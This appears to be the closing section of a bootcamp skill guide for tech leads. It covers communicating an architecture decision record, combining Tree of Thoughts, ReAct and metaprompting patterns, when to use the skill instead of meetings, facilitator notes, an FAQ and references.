## ADR-042 Communication: Monolith Modernization Strategy
### For Executive Leadership
"We're adopting an incremental microservices approach. Monthly progress visible.
Weekly deployments by month 12. Total cost $500K, achievable in 18 months."
### For Engineering Teams
"Your team gets a dedicated microservice in the next 6-9 months. Learn distributed
systems patterns alongside delivery. First service goes live month 4. Async
communication and database design are new skills we'll master together."
### For DevOps
"New API Gateway to manage. Deployment process extends to cover new services.
On-call remains unified initially. Increased monitoring complexity. Budget for
tools by month 3."
---
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Priority Builder Pattern
Map tech leadership work to ABCD:
```
Action: Make strangler fig decision (your architecture choice)
Behavior: Tree of Thoughts evaluation, 3 options rigorously assessed
Context: Team maturity, budget, timeline, scale requirements
Delivered: ADR document, implementation roadmap, risk mitigation
```
### Using with ReAct Pattern
Systematic technical investigation:
```
THINK: What questions do we need answered? (What's unknown about this approach?)
ACT: Run spike investigation, gather data (Build POC, run benchmarks, interview experts)
OBSERVE: Did we learn enough to decide? (Decision gates met? Risks understood?)
```
### Using with Tree of Thoughts
Multi-option evaluation (the core TL pattern):
```
GENERATE: What are 3 fundamentally different approaches? (Not variations)
EVALUATE: What are pro/con/risk for each? (Honest assessment)
CHOOSE: Which best fits constraints? (Clear rationale, risk acceptance)
```
### Metaprompting for Team Amplification
Build a hierarchy of prompts:
```
Level 1: Metaprompt for architects ("Design caching strategy")
Level 2: Role-specific prompts generated by metaprompt
- Backend engineer: "Implement cache client"
- DevOps: "Infrastructure for Redis cluster"
- QA: "Test cache hit/miss scenarios"
- Security: "Sensitive data handling in cache"
Level 3: Each role-specific prompt generates task assignments
```
---
## When to Use This Skill vs. Meetings
| Task | Use Meeting | Use Skill |
|------|-------------|-----------|
| Casual brainstorm | ✅ Meeting | ❌ Overkill |
| Whiteboard architecture | ✅ Meeting | ❌ Overkill |
| **Major architectural decision** | ❌ Ad-hoc | ✅ **This skill** |
| **Codify team standards** | ❌ Loose guidance | ✅ **This skill** |
| **Scope technical investigation** | ❌ Vague | ✅ **This skill** |
| **Create prompts for team** | ❌ Inconsistent | ✅ **This skill** |
| **Document decision rationale** | ❌ Lost in Slack** | ✅ **This skill** |
| **Train new engineers on patterns** | ❌ Tribal knowledge | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 3: Tech Leadership Patterns** when discussing:
- Tree of Thoughts pattern (GENERATE → EVALUATE → DECIDE)
- Metaprompting (prompts that generate prompts)
- Risk-aware decision-making
- Real-world architecture examples
### For Participants (Tech Lead Role-Fork Exercise)
**Use this skill when:**
- You're the "Tech Lead" in a role-fork scenario
- You need to make a major architectural decision
- You're building team technical standards
- You're scoping investigation work
- You need to communicate rationale to leadership
**Expected outcome:**
- Understand how structured interrogation builds architectural context
- See Tree of Thoughts in action with real trade-off analysis
- Generate production-quality ADRs and team standards
- Learn metaprompting for team amplification
---
## FAQ
**Q: Will this skill make decisions for me?**
A: No. It structures your thinking and gathers context. You make the final decision, but with better information.
**Q: How is this different from just discussing architecture?**
A: Structured interrogation ensures we don't miss constraints. Tree of Thoughts prevents premature convergence on familiar options. Written ADR becomes a team reference document.
**Q: Can I use this for small decisions?**
A: Yes, but it might be overkill for decisions that are reversible, low-risk, or have established precedent. Use your judgment.
**Q: What if I disagree with the generated options?**
A: Tell the skill during interrogation: "Our team is expert in [pattern], so that's a given." It will adjust.
**Q: How do I present an ADR to leadership?**
A: Use the generated ADR as-is. It's written for that audience. Highlight the decision, rationale, and consequences section.
**Q: Can I use this for hiring or team decisions?**
A: This skill focuses on technical architecture. For people decisions, you'll want a different tool.
**Q: How often should I create metaprompts?**
A: Create one whenever you notice yourself giving the same architectural guidance repeatedly. That's a signal it should be codified.
---
## References
- **Tree of Thoughts**: Yao et al. (2023) "Tree of Thoughts: Deliberate Problem Solving with Large Language Models"
- **Architecture Decision Records**: Nygard (2011) "Documenting Architecture Decisions"
- **Domain-Driven Design**: Evans (2003) "Domain-Driven Design"
- **Strangler Fig Pattern**: Fowler (2004) "Strangler Application"
- **Metaprompting**: Eisenschlos et al. (2022) "Reframing Instructional Prompts as Definition Pairs"
- **ReAct Pattern**: Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2 — Tech Lead Track